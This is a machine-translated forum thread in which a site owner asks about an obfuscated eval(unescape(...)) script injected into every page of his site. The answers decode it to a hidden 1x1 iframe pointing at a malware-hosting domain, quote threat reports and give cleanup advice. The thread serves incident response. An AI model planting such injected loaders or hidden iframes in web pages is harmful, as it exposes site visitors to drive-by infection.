该网站可能正在分发恶意软件?奇怪的javascript?

时间:2011-01-18 15:06:07

标签: javascript malware

<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%
74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%
70%3A%2F%2F%73%65%64%70%6F%6F%2E%63%6F%6D%2F%3F%33%33%38%33%
37%35%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%
3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script>

我的网站www.safwanmanpower.com受到每个页面中恶意软件脚本的攻击我不知道这个脚本是否可以解决这个脚本如何影响我的网站恶意软件?

希望得到快速和积极的回应。

已编辑

sumone如何在未经上传许可的情况下攻击我的网站?

10 个答案:

答案 0 :(得分:6)

您的网站已被已知实体入侵。您的网页现在正在为您的访问者提供漏洞,并使他们面临风险。

立即关闭您的网站,并参阅:http://safeweb.norton.com/report/show?name=sedpoo.com


Threat Report
Total threats found: 4

Drive-By Downloads (what's this?)
Threats found: 3
Here is a complete list: (for more information about a specific threat, click
 on the Threat Name below)
Threat Name:     HTTP Malicious Toolkit Variant Activity 15
Location:    http://sedpoo.com/?687328


Threat Name:     HTTP Malicious Toolkit Variant Activity 15
Location:    http://sedpoo.com/?-560137484


Threat Name:     HTTP Malicious Toolkit Variant Activity 15
Location:    http://sedpoo.com/?2443640

Viruses (what's this?)
Threats found: 1
Here is a complete list: (for more information about a specific threat, click
 on the Threat Name below)
Threat Name:    Trojan.Gen
Location:    http://sedpoo.com/des.jar


并且:http://www.google.co.uk/safebrowsing/diagnostic?site=sedpoo.com/

What is the current listing status for sedpoo.com?
Site is listed as suspicious - visiting this web site may harm your computer.

What happened when Google visited this site?
Of the 1887 pages we tested on the site over the past 90 days, 0 page(s)
 resulted in malicious software being downloaded and installed without user 
consent. The last time Google visited this site was on 2011-01-18, and the 
last time suspicious content was found on this site was on 2011-01-18.
Malicious software includes 2478 exploit(s), 2135 trojan(s), 1508 scripting 
exploit(s).

This site was hosted on 8 network(s) including AS4766 (Korea Telecom), 
AS51306 (UAIP), AS5610 (CZECH).

Has this site acted as an intermediary resulting in further distribution 
of malware?
Over the past 90 days, sedpoo.com appeared to function as an intermediary 
for the infection of 962 site(s) including feja-islame.com/, yaris-club.net/, 
cstbilisi.ge/.

Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It 
infected 2519 domain(s), including yaris-club.net/, feja-islame.com/, 
bhiee.net/.

How did this happen?
In some cases, third parties can add malicious code to legitimate sites, 
which would cause us to show the warning message.


在您进一步研究威胁并准备应对可能发生的潜在感染之前,我不会访问sedpoo攻击网站。启动虚拟机访问该站点是一种快速的方法,可以进一步调查,而不会使您的工作站和数据处于危害之中。

答案 1 :(得分:4)

未转义的代码是这样的:

document.wri% 74e('<iframe src="htt% 70://sedpoo.com/?3383% 375" width=1 height=1% 3E</iframe>')

评估它会为您的网站添加一个1px xpx的iframe,指向上述地址。

答案 2 :(得分:3)

您应该使用smscanner(简单服务器恶意软件扫描程序),它将扫描受感染的文件,脚本,混淆的javascript代码,shell等。它在Linux网络服务器上工作到目前为止

更多@ https://sourceforge.net/projects/smscanner/

答案 3 :(得分:1)

在chrome上,即unescapes到"document.wri% 74e('<iframe src="htt% 70://sedpoo.com/?3383% 375" width=1 height=1% 3E</iframe>')",Chrome告诉我这是一个托管恶意软件的网站。

答案 4 :(得分:1)

删除空白时,它会解码为:

document.write('<iframe src="http://sedpoo.com/?338375" width=1 height=1></iframe>')

答案 5 :(得分:0)

如果您想查看该代码的作用,请将转义后的代码粘贴到此网址上(我已经完成了,并且似乎正在尝试将您的网站重定向到另一个链接): http://www.linkedresources.com/tools/unescaper_v0.2b1.html

您是否在自己的网站上使用某种内容管理系统(CMS)?如果是这样,您可以做的最好的事情是去CMS的网站并下载最新版本。

答案 6 :(得分:0)

未转义的代码是:

document.write('<iframe src="http://sedpoo.com/?338375" width=1 height=1></iframe>')

正在创建一个http://sedpoo.com/?338375的iFrame,我假设它会为广告等生成弹出窗口

答案 7 :(得分:0)

使用工具here转义代码以获取此

document.write('<iframe src="http://sedpoo.com/?338375" width=1 height=1></iframe>')

将1px x 1px(实际上是不可见的)iframe嵌入到您的页面中,从这里最有可能通过漏洞攻击您的访问者或者只是尝试生成广告窗口

答案 8 :(得分:0)

我将回答直接问题:向每个页面注入脚本意味着黑客可以控制Web服务器,可能是整个主机Web场。

如何?也许他偷了管理员密码。也许他在主人工作并使用他种下的后门。 你无法真正知道,如果你被托管,你不能真正保护自己,因为这是主人的责任。

如果您已托管,请找到其他更可靠的主机。否则就像Cfreak评论并更改服务器上的所有密码,安装新的强大的防火墙等等......

编辑:如果服务器是您的(即您不使用第三方主机),请检查安全事件日志,并查看在感染期间登录的用户。显然,运行完整的病毒/恶意软件扫描。

答案 9 :(得分:0)

以下是经过反混淆的JavaScript代码:

document.write('<iframe src="http://sedpoo.com/?338375" width=1 height=1></iframe>')